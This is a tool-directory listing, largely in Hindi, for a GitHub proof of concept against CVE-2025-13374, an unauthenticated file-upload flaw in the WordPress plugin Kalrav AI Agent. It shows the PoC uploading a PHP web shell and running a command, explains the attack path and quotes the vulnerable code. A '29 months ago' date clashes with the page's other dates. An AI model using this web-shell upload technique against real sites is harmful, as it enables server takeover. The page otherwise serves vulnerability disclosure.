Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-13374 — Kalrav AI Agent <= 2.3.3 - बिना प्रमाणीकरण के मनमानी फ़ाइल अपलोड करने की सुविधा kalrav_upload_file AJAX कार्रवाई के माध्यम से | Kitploit
उपकरण/GitHubGitHub/d0n601/cve-2025-13374
पेलोड जनरेशनभेद्यता विश्लेषणकोड विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंग
GitHubd0n601/cve-2025-13374

CVE-2025-13374

Kalrav AI Agent <= 2.3.3 - बिना प्रमाणीकरण के मनमानी फ़ाइल अपलोड करने की सुविधा kalrav_upload_file AJAX कार्रवाई के माध्यम से

रिपॉजिटरी देखें
29 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Kalrav AI Agent <= 2.3.3 - बिना प्रमाणीकरण के मनमानी फ़ाइल अपलोड (kalrav_upload_file AJAX Action के माध्यम से)

WordPress Kalrav AI Agent प्लगइन (संस्करण 2.3.3 और पूर्व) में एक मनमानी फ़ाइल अपलोड भेद्यता है जो बिना प्रमाणीकृत उपयोगकर्ताओं को सर्वर पर दुर्भावनापूर्ण PHP फ़ाइलें अपलोड करने की अनुमति देती है, जो संभावित रूप से रिमोट कोड निष्पादन की ओर ले जाती है।

TL;DR Exploits

एक POC CVE-2025-13374.py प्रदान किया गया है जो एक रिमोट हमलावर द्वारा shell.php अपलोड करने और रिमोट कोड निष्पादित करने का प्रदर्शन करता है:

root@kitploit:~
python3 ./CVE-2025-13374.py http://techcorp.cc
[+] Target: http://techcorp.cc
[+] File uploaded successfully!
[+] Shell URL: http://techcorp.cc/wp-content/plugins/kalrav-ai-agent/uploads/1763247725-shell.php
[+] Command output:
www-data

Technical Description

यह भेद्यता /wp-admin/admin-ajax.php एंडपॉइंट पर फ़ंक्शन में मौजूद है। अपलोड कार्यक्षमता में उचित फ़ाइल सत्यापन, नॉन्स सत्यापन और क्षमता जाँच का अभाव है। यह बिना प्रमाणीकृत उपयोगकर्ताओं को मनमानी फ़ाइलें, जिनमें सर्वर पर निष्पादित की जा सकने वाली PHP फ़ाइलें शामिल हैं, अपलोड करने की अनुमति देता है।

kalrav_upload_file()

Attack Path Analysis

स्रोत: $_FILES['file'] से उपयोगकर्ता इनपुट (लाइन 978) सिंक: move_uploaded_file($_FILES['file']['tmp_name'], $target_path) (लाइन 982)

यह भेद्यता निम्न कारणों से होती है:

  1. रूट पंजीकरण: अपलोड एंडपॉइंट wp_ajax_nopriv_kalrav_upload_file हुक (लाइन 967) के माध्यम से पंजीकृत है, जो बिना प्रमाणीकरण पहुंच की अनुमति देता है।
  2. कोई प्रमाणीकरण नहीं: wp_ajax_nopriv_ उपसर्ग फ़ंक्शन को बिना प्रमाणीकृत उपयोगकर्ताओं के लिए सुलभ बनाता है।
  3. कोई नॉन्स सत्यापन नहीं: फ़ंक्शन में नॉन्स सत्यापन के माध्यम से CSRF सुरक्षा का अभाव है।
  4. कोई क्षमता जाँच नहीं: फ़ाइल अपलोड की अनुमति देने से पहले कोई अनुमति सत्यापन नहीं किया जाता।
  5. इनपुट प्रसंस्करण: $_FILES['file'] से उपयोगकर्ता-नियंत्रित फ़ाइल डेटा बिना सत्यापन के सीधे संसाधित किया जाता है।
  6. फ़ाइल हैंडलिंग: केवल basename() का उपयोग करके बुनियादी फ़ाइल नाम स्वच्छता लागू की गई है: time() . '-' . basename($_FILES['file']['name']) (लाइन 979), जो केवल निर्देशिका ट्रैवर्सल को रोकता है लेकिन फ़ाइल एक्सटेंशन को मान्य नहीं करता।
  7. फ़ाइल भंडारण: फ़ाइलें wp-content/plugins/kalrav-ai-agent/uploads/ में सहेजी जाती हैं।

Vulnerable Code Location

फ़ाइल: kalrav-ai-agent.php लाइनें: 969-996

root@kitploit:~
add_action('wp_ajax_kalrav_upload_file', 'kalrav_upload_file');
add_action('wp_ajax_nopriv_kalrav_upload_file', 'kalrav_upload_file');  

function kalrav_upload_file()
{
    // Path to your plugin uploads folder
    $upload_dir = plugin_dir_path(__FILE__) . 'uploads/';

    if (!file_exists($upload_dir)) {
        mkdir($upload_dir, 0755, true);
    }

    if (!empty($_FILES['file']['name'])) { 
        $file_name = time() . '-' . basename($_FILES['file']['name']);  
        $target_path = $upload_dir . $file_name;

        if (move_uploaded_file($_FILES['file']['tmp_name'], $target_path)) { 
            wp_send_json_success([
                'message' => 'File uploaded successfully!',
                'file_path' => $target_path,
                'url' => plugins_url('uploads/' . $file_name, __FILE__)  
            ]);
        } else {
            wp_send_json_error(['message' => 'Failed to move uploaded file.']);
        }
    } else {
        wp_send_json_error(['message' => 'No file uploaded.']);
    }

    wp_die();
}
टूल डाउनलोड करें